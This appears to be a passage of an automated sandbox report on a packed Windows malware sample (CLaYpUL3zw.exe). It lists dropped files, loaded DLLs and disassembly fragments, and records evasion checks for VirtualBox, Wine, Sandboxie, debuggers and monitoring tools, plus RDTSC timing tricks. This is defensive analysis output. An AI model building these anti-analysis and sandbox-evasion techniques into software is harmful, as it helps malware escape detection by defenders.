                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: CLaYpUL3zw.exeStatic file information: File size 7045120 > 1048576
                Source: CLaYpUL3zw.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x518a00
                Source: CLaYpUL3zw.exeStatic PE information: Raw size of uppnmxuj is bigger than: 0x100000 < 0x19a800

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeUnpacked PE file: 0.2.CLaYpUL3zw.exe.5d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;uppnmxuj:EW;wnsrsfkt:EW;.taggant:EW; vs :ER;.rsrc:W;
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,2_2_00406328
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: CLaYpUL3zw.exeStatic PE information: real checksum: 0x6bb78f should be: 0x6bb0cb
                Source: PasoCattle.exe.0.drStatic PE information: real checksum: 0x102e74 should be: 0x10b21d
                Source: CLaYpUL3zw.exeStatic PE information: section name:
                Source: CLaYpUL3zw.exeStatic PE information: section name: .idata
                Source: CLaYpUL3zw.exeStatic PE information: section name:
                Source: CLaYpUL3zw.exeStatic PE information: section name: uppnmxuj
                Source: CLaYpUL3zw.exeStatic PE information: section name: wnsrsfkt
                Source: CLaYpUL3zw.exeStatic PE information: section name: .taggant
                Source: Set-up.exe.0.drStatic PE information: section name: .eh_fram
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5494C push eax; iretd 3_3_00B5494D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5494C push eax; iretd 3_3_00B5494D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5494C push eax; iretd 3_3_00B5494D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5494C push eax; iretd 3_3_00B5494D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5494C push eax; iretd 3_3_00B5494D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5B4F8 pushfd ; iretd 3_3_00B5B4F9
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5B4F8 pushfd ; iretd 3_3_00B5B4F9
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5B4F8 pushfd ; iretd 3_3_00B5B4F9
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5B4F8 pushfd ; iretd 3_3_00B5B4F9
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5494C push eax; iretd 3_3_00B5494D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5494C push eax; iretd 3_3_00B5494D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5494C push eax; iretd 3_3_00B5494D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5494C push eax; iretd 3_3_00B5494D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5494C push eax; iretd 3_3_00B5494D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5B4F8 pushfd ; iretd 3_3_00B5B4F9
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5B4F8 pushfd ; iretd 3_3_00B5B4F9
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5B4F8 pushfd ; iretd 3_3_00B5B4F9
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5B4F8 pushfd ; iretd 3_3_00B5B4F9
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B4B630 push cs; retf 3_3_00B4B645
                Source: CLaYpUL3zw.exeStatic PE information: section name: uppnmxuj entropy: 7.954185855265194

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\768400\Climb.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\768400\Climb.comJump to dropped file
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeFile created: C:\Users\user\AppData\Local\Temp\PasoCattle.exeJump to dropped file
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeFile created: C:\Users\user\AppData\Local\Temp\Set-up.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_005826DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,14_2_005826DD
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0050FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,14_2_0050FC7C
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: PROCMON.EXE
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: X64DBG.EXE
                Source: CLaYpUL3zw.exe, CLaYpUL3zw.exe, 00000000.00000002.2251469203.00000000005D2000.00000040.00000001.01000000.00000003.sdmp, CLaYpUL3zw.exe, 00000000.00000003.2210580420.0000000005560000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: WINDBG.EXE
                Source: Set-up.exe.0.drBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: WIRESHARK.EXE
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: D6A3BF second address: D6A3C4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: D6A3C4 second address: D69C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 add dword ptr [ebp+122D33BDh], edx 0x0000000e push dword ptr [ebp+122D01A5h] 0x00000014 clc 0x00000015 call dword ptr [ebp+122D1DB5h] 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D379Ch], ecx 0x00000022 xor eax, eax 0x00000024 jmp 00007FA030F107B1h 0x00000029 mov edx, dword ptr [esp+28h] 0x0000002d clc 0x0000002e mov dword ptr [ebp+122D3970h], eax 0x00000034 pushad 0x00000035 mov eax, esi 0x00000037 mov esi, edx 0x00000039 popad 0x0000003a mov esi, 0000003Ch 0x0000003f jmp 00007FA030F107ABh 0x00000044 add esi, dword ptr [esp+24h] 0x00000048 or dword ptr [ebp+122D309Bh], edx 0x0000004e stc 0x0000004f lodsw 0x00000051 or dword ptr [ebp+122D37CFh], edx 0x00000057 add eax, dword ptr [esp+24h] 0x0000005b cld 0x0000005c mov ebx, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D37CFh], edx 0x00000066 push eax 0x00000067 push edi 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: D69C79 second address: D69C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: ECD44F second address: ECD45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EDEFAE second address: EDEFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FA030CAD66Ch 0x0000000d popad 0x0000000e pushad 0x0000000f jnl 00007FA030CAD67Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EDF139 second address: EDF14E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FA030F107A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EDF2CE second address: EDF2F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jl 00007FA030CAD677h 0x00000010 jmp 00007FA030CAD671h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EDF2F8 second address: EDF314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE285F second address: EE2864 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2864 second address: EE2886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jng 00007FA030F107BFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA030F107B1h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE2886 second address: D69C79 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007FA030CAD66Dh 0x0000000f pop eax 0x00000010 jng 00007FA030CAD66Ch 0x00000016 or dword ptr [ebp+122D33EDh], edi 0x0000001c push dword ptr [ebp+122D01A5h] 0x00000022 call dword ptr [ebp+122D1DB5h] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D379Ch], ecx 0x0000002f xor eax, eax 0x00000031 jmp 00007FA030CAD671h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a clc 0x0000003b mov dword ptr [ebp+122D3970h], eax 0x00000041 pushad 0x00000042 mov eax, esi 0x00000044 mov esi, edx 0x00000046 popad 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007FA030CAD66Bh 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 or dword ptr [ebp+122D309Bh], edx 0x0000005b stc 0x0000005c lodsw 0x0000005e or dword ptr [ebp+122D37CFh], edx 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 cld 0x00000069 mov ebx, dword ptr [esp+24h] 0x0000006d mov dword ptr [ebp+122D37CFh], edx 0x00000073 push eax 0x00000074 push edi 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: EE28C3 second address: EE2914 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA030F107A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D3395h], edi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FA030F107A8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov edx, dword ptr [ebp+122D3A18h] 0x00000035 xor dword ptr [ebp+122D1D0Eh], edi 0x0000003b call 00007FA030F107A9h 0x00000040 pushad 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
